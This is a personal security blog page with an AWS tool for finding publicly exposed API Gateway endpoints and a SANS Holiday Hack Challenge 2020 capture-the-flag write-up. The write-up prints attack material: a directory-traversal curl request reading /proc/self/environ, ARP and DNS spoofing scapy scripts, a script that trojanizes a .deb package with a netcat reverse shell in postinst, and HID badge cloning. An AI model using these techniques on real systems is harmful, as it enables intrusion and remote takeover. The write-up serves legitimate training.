Ashish Gupta

This user hasn't shared any biographical information

Homepage: http://ashishrocks.net

Ahh-My-API : Discover publically exposed APIs in AWS

TL;DR;

The REST API gateways created in AWS have a default endpoint [https://{api_id}.execute-api.{region}.amazonaws.com] and If not explicitly secured, they are publically accessible from internet by default. Wrote a script which would find such APIs across all regions under all the AWS accounts in the AWS organizations and takes screenshot their webpage for evidence. It will also generate a CSV file which may be ingested by a SIEM such as Splunk for alerting and remediation.

https://github.com/ashishmgupta/ah-my-api

The script when executed will produce a CSV file in the below format showing all the API URLs and which one could be publically accessible and which security setting are applied on the API if API is not accessible.

It is important to discover and actually test the endpoints from an external environment to reduce the false positives for detection becuase APIs can be secured by various means (described below)

Most common ways to secure AWS Rest APIs

  • API Token e.g. Check for specific token value in the pre-defined x-api-header.
  • Lambda Authorizers e.g. Custom lamda code to check for specific headers/secrets before allowing access.
  • Resource policies e.g. Allow access from certain IP addresses and deny others.
  • Authentication/Authorization from with in the backend code (e.g. Lambda).

How to use the script


We follow below two steps :

  • Set up an IAM user with approperiate permissions in the management account to assume a given role in the other accounts.
  • Set up the role to assume in all the workload accounts using CloudFormation and StackSets.

The script makes use of Access Key on the IAM user “boto3user” in the management account.
boto3user has the permission to assume role in the workload account and get temporary credentials to access the API gateways in the workload accounts. Diagram below :

In my AWS organizations, I have 3 AWS accounts out of which “Account 1” is the management account.

Setting up the IAM user and permissions in the management account

Create a IAM user named boto3user.

Create an access key and secret for the IAM user.

Create a policy with below and assosciate it with the IAM user.

ScanAWSAPIPolicy

This allows the user to assume the role named ScanAWSAPIRole in all the AWS accounts in the AWS organization.
Since the script will iterate through the AWS organizations as well, we provide the ListAccounts and DescribeAccount permission as well.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "organizations:ListAccounts",
                "organizations:DescribeAccount"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Resource": "arn:aws:iam::*:role/ReadOnlyAPIGatewayAssumeRole"
        }
    ]
}

Create the role to assume in the other accounts

We will use a CloudFormation template for the role to be created and Stackset to deploy the template across all the AWS accounts in the AWS organization.

  1. Download the CloudFormation template from here and save it locally :
    https://github.com/ashishmgupta/ah-my-api/blob/main/CloudFormation_Template_For_Role_and_Policy.yaml
  2. On the management account, navigate to CloudFormation > StackSets > Create StackSet

3. In the “Specify template” section, choose “Upload a template file” and browse to select the previously saved CloudFormation template

4. Specify a name for the StackSet and optional description.

5. In the deployment options screen, set the deployment target as “Deploy to Organization”
and specify US East as the region.

6. In the review screen, acknowledge and submit.

StackSet has been deployed with success.

Verify the role has been created across all the accounts

We can see the role “ReadOnlyAPIgatewayAssumeRole” has been created in the AWS accounts.
The “Trusted entities” is the AWS Account number of the management account which is trusted to assume the “ReadOnlyAPIgatewayAssumeRole” role.

If we look at the role, we see the Policy named “ReadOnlyAPIGatewayPolicy” is attached to it with GET/HEAD operations on apigateway just like we specified in the CloudFormation template.

when we look at the “Trusted Entities”, we notice the IAM user named “boto3user” in the management account.
This means It is this user which has the permission to assume the “ReadOnlyAPIgatewayAssumeRole” role in all the AWS accounts and call the API gateway GET/HEAD operation.

Running the script

Setup the AWS credentials

aws configure

Clone the git repo

https://github.com/ashishmgupta/ah-my-api.git

Install all the requirements

pip install -r requirements

Run the script

python .\ah-my-api.py

,

Leave a comment

Received “Super Honorable mention” in Holiday Hack Challenge 2022 !!!

What an honor to be in that list of “Super Honorable mentions” for my report submission to SANS Institute Holiday hack challenge 2022 out of 16K participants! 2nd time in 2 years. Thank you Counter Hack Ed Skoudis Chris Elgee Jared Folkins❗Eric Pursley Evan Booth for the terrific experience and learnings as always. #kringlecon #holidayhackchallenge

Leave a comment

SANS Holiday Hack Challenge 2022 (KringleCon 5) Write-up

This is my 4th year of submission to the SANS Holiday Hack challange. I had fun and learnt a lot just like previous years.

Here is my writeup for this year. Hope you enjoy it.

https://ashishmgupta.github.io/blog/docs/SANS-HHC-2022/site/

, ,

Leave a comment

Microsoft 365 Security Implementation

Below are the concrete steps we can take to secure Microsoft O365 tenants.

Microsoft O365 Security Implementation (ashishmgupta.github.io)

(This will be a living document and will be updated as new features are published)

This includes below :

, ,

Leave a comment

SANS Holiday Hack Challenge 2021 (KringleCon 4) Write-up

Holiday Hack Challenge is a CTF challenge organized by SANS and Counter Hack during Christmas each year. This year the CTF was named “KringleCon 4: Jack’s back”.
It had total 13 objectives completing which one would reveal the narrative and win the CTF.

These objectives skill tested various significant areas of penetration testing – namely Active directory attacks, Cryptographic attacks, SQL injection, Server Side Request Forgery, Network Packet analysis to name a few and something very new – FPGA programming!
As you progressed, the difficulty level of the objectives increased.
It was a mind-numbing and awesome experience to complete all those objectives.
Below is the write-up of those objectives including the answers.

https://ashishmgupta.github.io/blog/site/SANS%20Holiday%20Hack%20Challenge%202021/

, ,

Leave a comment

SANS Holiday Hack Challenge 2020 (KringleCon 3) Write-up

Holiday Hack Challenge is a CTF challenge organized by SANS and Counter Hack during Christmas each year. This year the CTF was named “KringleCon 3: French Hens”. It had total 12 objectives and 12 terminals.
Those 12 objectives tested hacking skillsets using Python, Javascript, Network security, Cryptography etc.
As you progressed, the difficulty level of the objectives increased.
It was a mind-numbing and awesome experience to complete all those objectives.
Below is the write-up of those objectives including the answers.

Answers :

ObjectiveAnswer
Objective 1: Uncover Santa’s Gift ListProxmark
Objective 2: Investigate the S3 bucketNorth Pole: The Frostiest Place on Earth
Objective 3: Point-of-sale Password Recoverysantapass
Objective 4: Operate the SantavatorNo answer.
This needed to be solved using Javascript by manipulating the position of objects.
Objective 5 : Open HID BlockNo answer.
This needed to be solved using the Proxmark CLI.
Objective 6: Splunk Challenge
Training Question 1
13
Objective 6: Splunk Challenge
Training Question 2
t1059.003-main t1059.003-win
Objective 6: Splunk Challenge
Training Question 3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
Objective 6: Splunk Challenge
Training Question 4
2020-11-30T17:44:15Z
Objective 6: Splunk Challenge
Training Question 5
3648
Objective 6: Splunk Challenge
Training Question 6
quser
Objective 6: Splunk Challenge
Training Question 7
55FCEEBB21270D9249E86F4B9DC7AA60
Objective 6: Splunk Challenge
The challenge question
The Lollipop Guild
CAN Bus Problem
This is was the prerequisite for
Objective 7 : Solve the Sleigh’s CAN-D-BUS Problem
122520
Objective 8: Broken Tag GeneratorJackFrostWasHere
Objective 9: ARP ShenanigansTanta Kringle
Objective 10: Defeat Fingerprint SensorNo answer.
This needed bypassing the “Santa” check using Javascript and Fiddler
Objective 11a): Naughty/Nice List with Blockchain Investigation Part57066318F32F729D
Objective 11b): Naughty/Nice List with Blockchain Investigation Part 2fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

Objective 1 : Uncover Santa’s Gift List

There is a photo of Santa’s Desk on that billboard with his personal gift list. What gift is Santa planning on getting Josh Wright for the holidays? Talk to Jingle Ringford at the bottom of the mountain for advice.

Answer : Proxmark

Process :

1) Downloaded the photograph.
2) Cropped the photo with only the gift list.
3) Installed Gimp
4) Used Filter > Distort > Whirl and Pinch
5) Unwirl to find the answer

Original billboard image :

Unwirled Image to find the item :

Objective 2: Investigate the S3 bucket

When you unwrap the over-wrapped file, what text string is inside the package? Talk to Shinny Upatree in front of the castle for hints on this challenge.

Answer :
North Pole: The Frostiest Place on Earth

Process :

Using bucket_finder.rb s3 bucket “wrapper3000” was downloaded and extracted.
This folder has a file named ‘package’ which has base64 encoded string
Below is the process of unwrapping process of ‘package’ file all the way to the text file:
wrapper3000/package > base64 decode > zip file > .bz2 file > .tar file > .xxd file > .xz file > .z file > ASCII text file.

#!/bin/bash -x
# Author : Ashish Gupta
# Below will download the s3 bucket and will keep unwap till we find a text file 
# The downloaded and extracted folder "wrapper" has this file named 'package' which has base64 encoded string
# Unrapping process :
# wrapper3000/package > base64 decode > zip file > .bz2 file > .tar file > .xxd file > .xz file > .z file > ASCII text file

#
# Assuming we are on home, this will show the items TIPS  bucket_finder
ls
# Go to bucket_finder
cd bucket_finder/
# Check what is currently in the wordlist
cat wordlist
# Append wrapper3000 to the wordlist
echo wrapper3000 >> wordlist
# Check to make sure wrapper3000 is appended to the wordlist
cat wordlist
# Search for s3 buckets with names noted in the 'wordlist' file and if found download them
# Below will download the file named 'package' 
./bucket_finder.rb wordlist -d
# change to downloaded wrapper3000/ directory
cd wrapper3000
# Check to make sure a file named 'package' exists
ls
# What kind of file is 'package'
# Below will show "package: ASCII text, with very long lines"
file package
# May be a base64 file. decode it to a file named 'myfile'
cat package | base64 -d > myfile
# What kind of file is myfile
# Below will show "myfile: Zip archive data, at least v1.0 to extract"
# So, myfile is a zip. extract using unzip.
# Below will extract to a .bz2 file printing the below
#Archive:  myfile
# extracting: package.txt.Z.xz.xxd.tar.bz2 
unzip myfile
# What kind of file is "package.txt.Z.xz.xxd.tar.bz2" 
# Below will show a bz2 file named "package.txt.Z.xz.xxd.tar.bz2" printing the below :
# package.txt.Z.xz.xxd.tar.bz2: bzip2 compressed data, block size = 900k
file package.txt.Z.xz.xxd.tar.bz2 
# Its bz2 file, extract using bzip2
# Below will extract the bz2 file to another file named "package.txt.Z.xz.xxd.tar"
bzip2 -d package.txt.Z.xz.xxd.tar.bz2
# We have now package.txt.Z.xz.xxd.tar
# What kind of file is "package.txt.Z.xz.xxd.tar"
# below will show .tar printing below :
# package.txt.Z.xz.xxd.tar: POSIX tar archive
file package.txt.Z.xz.xxd.tar 
# Extract the tar file. It will extract to package.txt.Z.xz.xxd
tar -xvf package.txt.Z.xz.xxd.tar
# What kind of file is "package.txt.Z.xz.xxd"
# package.txt.Z.xz.xxd: ASCII text
file package.txt.Z.xz.xxd
# use xxd on this to extract to test2.xz
xxd -r package.txt.Z.xz.xxd test2.xz
# What kind of file is "test2.xz"
# test2.xz: XZ compressed data
file test2.xz
# uncompress test2.xz using xz which will extract the file named "test2"
unxz test2.xz
# rename file test2 to test2.z
mv test2 test2.z
# uncompress test2.z. this will create a file named "test2"
uncompress test2.z
# What kind of file is "test2"
# test2: ASCII text
file test2
# Print the contents of this text file
# Output would show "North Pole: The Frostiest Place on Earth"
cat test2

Objective 3: Point-of-sale Password Recovery

Help Sugarplum Mary in the Courtyard find the supervisor password for the point-of-sale terminal. What’s the password?

Answer : santapass

Process :

Step 1: Extract the santa-shop.exe using 7zip. You see the ASAR file.

Step 2: Extract the source code from ASAR application and find the password in main.js

Objective 4: Operate the Santavator

Talk to Pepper Minstix in the entryway to get some hints about the Santavator.

Process

Use the chrome JS console to rotate the green light and candycane so we can get lights to all the outlets.

a = document.querySelector("body > div.box-parent > div.item.light.greenlight")
a.style.transform = "rotate(-45deg)"
candy = document.querySelector("body > div.box-parent > div.item.item.candycane")
candy.style.transform="rotate(-10deg)"

Objective 5 : Open HID Block

Open the HID lock in the Workshop. Talk to Bushy Evergreen near the talk tracks for hints on this challenge. You may also visit Fitzy Shortstack in the kitchen for tips.

Copy the badge id from elf Bow Ninecandle

Go near Bow Ninecandle in teh “Talks” floor.

Open the Proxmark3 CLI from the “Items” menu

Copy the badge value from Bow Ninecandle using the below command :

lf hid read

The tag id is 2006e22f0e

Use the copied tag id to unlock the door in workshop room

Go to the workshop floor and stand in front of the lock.

Open Proxmark CLI and simulate the tag id “2006e22f0e” of Bow Ninecandle

lf hid sim -r 2006e22f0e

The door is unlocked!!!

When you enter the room you just unlocked, Its all dark with light at the end.
You approach it……

and you become Santa!!!
This was a magical moment for me!

Objective 6: Splunk Challenge

Access the Splunk terminal in the Great Room. What is the name of the adversary group that Santa feared would attack KringleCon?

Splunk Training question 1

How many distinct MITRE ATT&CK techniques did Alice emulate?

Answer : 13

Process :

Execute the below Splunk query :

| tstats count where index=t* by index 
| eval results=split(index,"-")  
| eval without-dash=mvindex(results,0)
| table without-dash
| rex field=without-dash mode=sed "s/\..*$//" 
| dedup without-dash

OR

| tstats count where index=* by index 
| search index=T*-win OR T*-main
| rex field=index "(?<technique>t\d+)[\.\-].0*" 
| stats dc(technique)

Splunk Training Question 2 :

What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)

Answer : t1059.003-main t1059.003-win

Process :

Execute the below Splunk query:

index=t1059.003*
| table index
| dedup index
| sort index 

Output :

Splunk Training Question 3 :

One technique that Santa had us simulate deals with ‘system information discovery’. What is the full name of the registry key that is queried to determine the MachineGuid?

Answer: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography

Process :

“System Information Discovery” is technique T1082
https://attack.mitre.org/techniques/T1082/

Note per the question, a registry key was queried, so execute the below Splunk query on the all the indexes for the technique t1082 for “reg” to get the registry key which was queried, since the “MachineGuid” needed to be determined, It must have been part of the query, so included that as well in the Splunk query:

index=t1082* reg machineguid  CommandLine!=''
|  table CommandLine

Output :

Splunk Training Question 4

According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)

Answer: 2020-11-30T17:44:15Z

Process :

1) Go to the Atomic test GitHub page
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/Indexes/Indexes-Markdown/index.md

2) Look for “OSTAP”.

3) Execute the below Splunk query on the “attack” index to get the 1st OSAT related text executed.

index=attack OSTAP 
| table "Execution Time _UTC"
| sort "Execution Time _UTC" asc

Splunk Training Question 5

One Atomic Red Team test executed by the Attack Range makes use of an open-source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?

Answer : 3648

Process :

1) First look up what projects were authored by frgnca
https://github.com/frgnca

2) Search in the attack index with the above projects one by one and you get a hit on “audio”

index=attack audio

We get a hit on this with technique# T1123

3) Confirmed the T1123 does make use of the project “AudioDeviceCmdlets”
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md

4)  Now pivot to index for the technique T1123 for the “audio” and the Sysmon as source with TimeCreated as time. Note that “tail 1” is used as the ask is to get the process id associated with the “first use”. “tail 1” will provide the 1st record (1st use) as Splunk returns the search results sorted so that the latest result comes first.

index=t1123* EventCode=1 *audio*  source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" 
| tail 1
| table  TimeCreated, process_id, CommandLine, *

Splunk Training Question 6

Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?

Answer : quser

Process :

1) Let’s find which techniques uses the Windows Registry run keys.
Go to https://mitre-attack.github.io/attack-navigator/v3/enterprise/
and search for “run” and “view” the 1st result

Its Technique# T1447
Windows registry run keys
https://attack.mitre.org/techniques/T1547/001/

2) Search index t1547 for the sysmon logs for technique with bat

index=t1547* "*bat*" source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" CommandLine!=''
| table CommandLine

There are two bat files batstartup.bat (stored local) and Discovery.bat (on Github)
Please click on the image to see the larger version.

The batch file location appears very small in the above screenshot so listing them out below:
1) $env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat\
2) https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat

Sysmon logs can’t have the source code of the batstartup.bat.
But look at the second one. It’s on GitHub.
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat

Just go to that URL and the last line of that batch file is “quser”

Splunk Training Question 7 :

According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?

Answer : 55FCEEBB21270D9249E86F4B9DC7AA60

Process :

Looking at ALL the technique indices (index=t* ) with source as the zeek x509 logs specifically win-dc:

index=t* *cert* source="/opt/zeek/logs/current/x509.log" certificate.subject=*win-dc*
|  table certificate.serial, certificate.subject
|  dedup certificate.serial, certificate.subject

The Splunk challenge question :

What is the name of the adversary group that Santa feared would attack KringleCon?

Answer : The Lollipop Guild

Process :

Gather all the hints!
Alice gave a few hints:

Hint 1:
Alice says the “ciphertext is 7FXjP1lyfKbyDK/MChyf36h7”
Hint 2:
Alice says “We don’t care about RFC 7465”
RFC 7465 requires that the TLC clients and servers never negotiate the user of RC4 ciphers when they establish connections.
https://tools.ietf.org/html/rfc7465
So, if they don’t care about RFC 7465, they ignore that RC4 should not be used and still used RC4 ciphers.
This means the encryption method used was RC4.
But encryption needs a key. What that key would be?

Hint 3

Alice says the last one is encrypted using “your favorite phrase”
Santa asks “my favorite phrase?”
Alice says “I can’t believe the Splunk folks put it in their talk”

now, we go and watch the below talk which is in Kringlecon 2020:
Dave Herrald, Adversary Emulation and Automation | KringleCon 2020
Mr. Dave Herrald has the below in the video:

and he says, this is the most important slide you want to take note of if you are preparing for the Splunk challenge within holiday hack challenge 2020:

Stay Frosty
(That might be our encryption key)

Find answer using all the hints:

So, far we have below hints:
a) We have the base64 text 7FXjP1lyfKbyDK/MChyf36h7
b) We know RC4 could potentially be the encryption method
c) We know “Stay Frosty” could potentially be the encryption keys used in RC4

Now we use all the hints to find out the adversary The Lollipop Guild
Open Cyberchef
https://gchq.github.io/CyberChef/

Build the receipe :
1st item:
“From Base64”
input: 7FXjP1lyfKbyDK/MChyf36h7

2nd Item:
“Encryption /Encoding” > RC4
Passphrase: Stay Frosty

Answer: The Lollipop Guild

CAN Bus Problem

Answer : 122520

Process :

When you open the UI, you will see many messages.
Filter out the noise with those all 0’s in the message in the Sleigh CAN-D bus.
When you click unlock, there is one message which consistently comes up :
19B#00000F000000

Filter out the other one 19B#0000000F2057.
Now, we have consistently 19B#00000F000000 when we click unlock.

Criteria added to filter noise and message for unlock found

Now in the CAN-Bus Investigation terminal, grep for “19B#00000F000000″ in the canndump.log and you see the entry 1608926671.122520.
This challenge needed the decimal portion of the timestamp and hence the answer is 122520.
Please see the below screenshot.

Find the CAN id# in the candump.log; Get the decimal portion of the mssage Id (the answer)

Objective 7: Solve the Sleigh’s CAN-D-BUS Problem

Jack Frost is somehow inserting malicious messages onto the sleigh’s CAN-D bus. We need you to exclude the malicious messages and no others to fix the sleigh. Visit the NetWars room on the roof and talk to Wunorse Openslae for hints.

Process :

Wunorse Openslae says there is an issue with breaks and doors :

Hints from Wunrose Openslae

CAN ID of doors is 19B
CAN ID of breaks is 080

“Breaks” fix – Exclude all the messages containing FF (larger numbers, greater than decimal 100)
“Doors” fix – Exclude the malicious messages 0F2057

Objective 8: Broken Tag Generator

Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is in the environment variable GREETZ? Talk to Holly Evergreen in the kitchen for help with this.

Answer : JackFrostWasHere

High level Approach:

Exploit the directory traversal vulnerability in the tag generator application to use the Local File Inclusion (LFI) on the web server running the application and then access the /proc/self/environ which will contain the all the environment variable used by the web server process including the variable named “GREETZ”

Process :

Check if the web app has directory traversal vulnerability

The elf Holly Evergreen thinks there may be an issue with the “file upload” feature :

Hints from Holly Evergreen

When you upload an image in the tag generator, the image is stored with below URL.
https://tag-generator.kringlecastle.com/image?id=<guid>.png
[Please click on the image below to see enlarged image]

Chrome network tab showing the URL when image is uploaded:
https://tag-generator.kringlecastle.com/image?id=<guid>.png

When you upload a non-image file, it gives a below error.
From the error, we understand the below:

  1. It’s a Ruby on Rails app
  2. the app.rb resides in /app/lib
  3. app.rb stores the user uploaded files in /tmp
Error when you upload an image file

Assuming whatever is being uploaded in /temp is being evaluated without any validation, if we can try directory traversal to get the code of app.rb

curl https://tag-generator.kringlecastle.com/image?id=../app/lib/app.rb

../app/lib/app.rb
This means, from the current directory /tmp, go one level up (means root), then app, then lib and then can get app.rb

Now we have the source code of the app.rb :

Use the Local File Inclusion (LSI) to access the environment variables of the process

So, we know this Ruby application has the directory traversal vulnerability
curl https://tag-generator.kringlecastle.com/image?id=../app/lib/app.rb

Under Linux, /proc/self is a dynamic symlink that the kernel provides that points to the process opening it.
e.g., if process 1234 tries to follow /proc/self, it will be looking the same content as /proc/1234
and then proc/self/environ will have all the environment variables for the process.

curl https://tag-generator.kringlecastle.com/image?id=../proc/self/environ | tr '\0' '\n'

This will list all the environment variables including “GREETZ” value of which would be “JackFrostWasHere

Objective 9: ARP Shenanigans

Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?

Answer : Tanta Kringle

High level approach :

  1. Change the ARP cache of target machine (10.6.6.35) so all requests come to our host (ARP Poisoning) and we respond to DNS requests (DNS poisoning).
  2. Build a Linux trojan on a deb file (which 10.6.6.35 is constantly requesting). This Linux trojan when executed on 10.6.6.35 will open a reverse shell of 10.6.6.35 on our host.
  3. With shell access on the 10.6.6.35, we get access to the file /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt which will have the name who recused herself from the vote described on the document.

Below screenshot shows how we determined the machines.

Nslookup provides more information on those 3 hosts.

The Process :

ARP Poisoning:

Spoof the ARP response going to 10.6.6.35 with our MAC address so all requests (including DNS requests) from 10.6.6.35 come to our host (ARP Poisoning). Change the /script/arp_resp.py accordingly.

DNS Poisoning :

Since we can intercept all the DNS requests coming from 10.6.6.35, we can respond to those DNS responses (DNS poisoning). Change the /script/dns_resp.py accordingly.

Create a Linux trojan with netcat reverse shell payload for port 4444 in it

10.6.6.35 requests for a specific DEB file (pub/jfrost/backdoor/suriv_amd64.deb) over HTTP.
We can create a Linux trojan with any DEB file renamed as above deb file which will include a netcat reverse shell.
The Linux trojan will be placed in the same directory structure as requested by 10.6.6.35 [pub/jfrost/backdoor/suriv_amd64.deb]

Run Python web server and netcat listening on port 4444

Run the python web server on the root.
Run netcat listening on our host on port 4444.

Showing ARP Poisoning

Changes to the script/arp_resp.py :

Changes to scripts/arp_resp.py

DNS Poisoning diagram :

Please click on the image to see the enlarged view :

DNS poisoning

Changes to scripts/dns_resp.py

Changes to scripts/dns_resp.py

Creating the linux trojan :

The debs/ folder has a number of deb files. We choose netcat-traditional_1.10-41.1ubuntu1_amd64.deb
Add netcat reverse shell script to this deb file :

nc 10.6.0.3 4444 -e /bin/sh

Above will executed when the deb file is requested and executed on 10.6.6.35. This will give a reverse shell on 10.6.6.35 to out host 10.6.0.3 on 4444.
Ref : http://www.wannescolman.be/?p=98

Putting it all together :

See the below screenshot the processes executed in the below order – numbered in the below screenshot.

0 : netcat -nlvp 4444
1 : tcpdump -i eth0 -w dump2.pcap
2 : python3 -m http.server 80
3 : python3 scripts/dns_resp.py
4 : python3 scripts/arp_resp.py
5 : We get reverse shell on 10.6.6.35

Once we get the reverse shell on 10.6.0.3, we can get the file NORTH_POLE_Land_Use_Board_Meeting_Minutes and found who recused hersef from vote.

It was Tara Kringle!

All Script files in the zip file (please remove the .txt from files after extraction):

arp_resp.py (with changes) for ARP poisoning

                                                                                   
#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid

# Our eth0 ip
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our eth0 mac address
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])

def handle_arp_packets(packet):
    # if arp request, then we need to fill this out to send back our mac as the response
    if ARP in packet and packet[ARP].op == 1:
        ether_resp = Ether(dst=packet[ARP].hwsrc, type=0x806, src=macaddr)

        arp_response = ARP(pdst=packet[Ether].psrc)
        arp_response.op =  'is-at'
        arp_response.plen = 4
        arp_response.hwlen = 6
        arp_response.ptype = 0x800
        arp_response.hwtype = 0x1

        arp_response.hwsrc = macaddr
        arp_response.psrc =  packet[ARP].pdst
        arp_response.hwdst = packet[ARP].hwsrc
        arp_response.pdst = packet[ARP].psrc

        response = ether_resp/arp_response

        sendp(response, iface="eth0")

def main():
    # We only want arp requests
    berkeley_packet_filter = "(arp[6:2] = 1)"
    # sniffing for one packet that will be sent to a function, while storing none
    sniff(filter=berkeley_packet_filter, prn=handle_arp_packets, store=0, count=1)

if __name__ == "__main__":
    main()

dns_resp (with changes) for DNS poisoning :

#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid

# Our eth0 IP
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our Mac Addr
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
# destination ip we arp spoofed
ipaddr_we_arp_spoofed = "10.6.6.53"

def handle_dns_request(packet):
    # Need to change mac addresses, Ip Addresses, and ports below.
    # We also need
    eth = Ether(src=packet.dst, dst=packet.src)   
    ip  = IP(dst=packet[IP].src, src=packet[IP].dst)
    udp = UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)
    dns = DNS(
        # MISSING DNS RESPONSE LAYER VALUES 
        id=packet[DNS].id,
        qr=1,
        ancount=1,
        aa=1,
        qd=packet[DNS].qd,
        an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=ipaddr)
    )
    dns_response = eth / ip / udp / dns
    sendp(dns_response, iface="eth0")

def main():
    berkeley_packet_filter = " and ".join( [
        "udp dst port 53",                              # dns
        "udp[10] & 0x80 = 0",                           # dns request
        "dst host {}".format(ipaddr_we_arp_spoofed),    # destination ip we had spoofed (not our real ip)
        "ether dst host {}".format(macaddr)             # our macaddress since we spoofed the ip to our mac
    ] )

    # sniff the eth0 int without storing packets in memory and stopping after one dns request
    sniff(filter=berkeley_packet_filter, prn=handle_dns_request, store=0, iface="eth0", count=1)

if __name__ == "__main__":
    main()

build_linux_trojan.sh [to create a Linux trojan with a .deb file]

#!/bin/bash
cd ~/
mkdir build-payload
cp debs/netcat-traditional_1.10-41.1ubuntu1_amd64.deb build-payload/
cd build-payload
mkdir work
echo "Extracting netcat-traditional_1.10-41.1ubuntu1_amd64.deb to work/ folder"
dpkg -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb work
mkdir work/DEBIAN
ar -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb 
echo "Extracting the control and postinst file from netcat-traditional_1.10-41.1ubuntu1_amd64.deb and "
tar -xf control.tar.xz ./control
tar -xf control.tar.xz ./postinst
echo "stuffing nc 10.6.6.53 4444 -e /bin/sh to the postinst file"
echo "nc 10.6.0.3 4444 -e /bin/sh" >> postinst    # thats my IP address which I want 10.6.6.35 to connect to get the reverse shell on this host
mv control work/DEBIAN/
mv postinst work/DEBIAN/
cd ~/
echo "buiding the deb package"
dpkg-deb --build build-payload/work/
cd ~/
mkdir -p pub/jfrost/backdoor
echo "moving the work.deb to pub/jfrost/backdoor/suriv_amd64.deb"
mv build-payload/work.deb pub/jfrost/backdoor/suriv_amd64.deb
echo "pub/jfrost/backdoor/suriv_amd64.deb is ready!"

Objective 10: Defeat Fingerprint Sensor

Bypass the Santavator fingerprint sensor. Enter Santa’s office without Santa’s fingerprint.

High level details :

  1. When you click the elevator panel, a special JavaScript file named “app.js” get loaded which checks for a flag named “besanta” for successful scan of the fingerprint.
  2. We host that “app.js” file in our local with the “besanta” check removed and then load that file using Fiddler instead of server app.js.
  3. With “besanta” check removed, you bypass the fingerprint check.

Process :

Below actions are as me (not Santa).
If you right click on the Scan Fingerprint and “Inspect”

User Chrome’s inspect to look at the javascript behind the “Scan fingerprint” image

You will see the that fingerprint image is actually a DIV with class name “print-cover” with click action handler of which is in app.js.

View source showing the click handler will execute a function in https://elevator.kringlecastle.com/app.js

Now look at the event handler in the app.js.
In addition to the powered, it checks if the token named “besanta“.
If It’s there, it will allow to go to Santa’s office. If not, it will play error sound.

Click handler of “Scan fingerprint” image

Now, what we can do is to make a copy of this app.js, remove that && hasToken(‘besanta’) condition.
Then host that in local IIS server (like http://localhost/app.js)

Check for “besanta” removed in local app.js

Open Fiddler and apply filter for app.js so when you click on the scan fingerprint image only that URL gets captured.
https://elevator.kringlecastle.com/app.js

  1. Traffic to https://elevator.kringlecatsle.com/app.js is captured.
  2. Filter applied
  3. Filter to “show if URL contains”
  4. Filter value “app.js”

Save the contents of https://elevator.kringlecastle.com/app.js to a file named app.js and py the file in local IIS server e.g. c:\inetpub\wwwroot so the file could be accessble on https://localhost/app.js

See the below screenshot (steps are numbered):
Go to Fiddler > AutoResponder (1) > Enable Rules (2) > Add Rule (3) > Add https://localhost/app.js (4) > Save (5)

This will replace the has Token app.js file from sever https://elevator.kringlecastle.com/app.js  (with ‘besanta’ check)

Now when you click on the fingerprint scanner, you will be able to get into Santa’s office.

Objective 11a): Naughty/Nice List with Blockchain Investigation Part 1

Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000? Talk to Tangle Coalbox in the Speaker UNpreparedness Room for tips on prediction and Tinsel Upatree for more tips and tools. (Enter just the 16-character hex value of the nonce)

Answer : 57066318F32F729D

High-level approach :

In Santa’s office, Tinsel Upatree has the Blockchain.dat and the zip file containing the python script
The naughty_nice.py verifies the block chain up to block# 129996. So, we have nonce up to 12996.
If we get the last 624 nonces with last one being of block# 12996, we can use the MT19937Predictor to get the nonce of 12997, 12998, 12999 and finally 13000 which is needed by this objective.

Details :

The zip file named OfficialNaughtyNiceBlockchainEducationPack.zip has following contents.
We put the Blockchain.dat to examine it using the naughty_nice.py

Contents of “OfficialNaughtyNiceBlockchainEducationPack.zip”

The naughty_nice.py was changed to get all the last 624 nonces of the blockchain.
Then those last 624 nonces were fed into the MT19937Predictor() to get nonce for block# 12997
The nonce of 12997 was included in the list to get the nonce for block# 12998.
The nonce of 12998 was included in the list to get the nonce for block# 12999.
The nonce of 12999 was included in the list to get the nonce for block# 13000.

For changes in the naughty_nice.py, compare the naughty_nice_original.py and naughty_nice.py.

Changes in “naughty_nice.py”
Running naughty_nice.py. The nonce for block#13000 is 6270808489970332317

Converting to hexadecimal It would be 57066318F32F729D and that’s the answer.

Convering decimal to hex

